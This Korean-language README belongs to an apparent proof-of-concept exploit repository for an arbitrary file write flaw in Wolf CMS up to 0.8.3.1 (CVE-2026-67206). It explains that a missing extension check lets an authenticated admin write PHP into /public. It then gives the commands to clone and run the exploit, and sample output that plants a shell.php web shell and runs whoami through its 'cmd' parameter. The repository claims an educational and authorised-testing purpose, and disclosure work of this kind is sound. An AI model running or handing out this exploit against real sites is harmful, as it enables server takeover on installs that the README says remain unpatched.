
Wolf CMS <= 0.8.3.1용 PoC 익스플로잇: 관리자(Admin)에 인증하여 FileManagerController를 통해 /public에 임의의 PHP 파일을 작성하고, 웹 셸을 통해 명령을 실행합니다.
이 저장소는 CVE-2026-67206에 대한 PoC(Proof of Concept) 익스플로잇을 포함하고 있습니다.
이 프로젝트는 교육 목적과 승인된 보안 테스트를 위해서만 제공됩니다. 소유하지 않았거나 테스트 권한이 없는 시스템에 사용하지 마십시오.
Wolf CMS 0.8.3.1까지의 모든 버전에서 임의 파일 쓰기 취약점이 존재합니다. 이 취약점으로 인해 인증된 공격자는 FileManagerController.php의 create_file() 및 save() 함수를 통해 웹 루트의 /public 디렉토리에 악의적인 임의 파일을 작성할 수 있습니다. FileManagerController.php의 create_file() 함수는 파일 확장자를 검증하지 않으므로, 인증된 공격자가 악성 PHP 스크립트를 작성하고 원격 코드 실행 권한을 획득할 수 있습니다.
소스 코드 분석과 익스플로잇 시연이 포함된 상세한 분석 글은 제 Medium 블로그에서 확인할 수 있습니다.
Wolf CMS 0.8.3.1까지의 모든 버전이 영향을 받습니다. Wolf CMS 저장소는 2021년 8월 28일자로 보관되었으며 더 이상 적극적으로 유지 관리되지 않습니다. 현재 이 취약점에 대한 패치는 존재하지 않습니다.
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K
[*] 제공된 자격 증명으로 로그인 중...
[+] 로그인 성공
[*] shell.php라는 파일 생성 중...
[+] 파일 생성 성공
[*] shell.php에 페이로드 작성 시도 중...
[+] 페이로드 작성 성공!
[+] 웹 셸은 http://127.0.0.1:8080/public/shell.php에서 'cmd' 쿼리 문자열로 접근할 수 있습니다.
[+] http://127.0.0.1:8080/public/shell.php?cmd=whoami 출력 테스트 중
www-data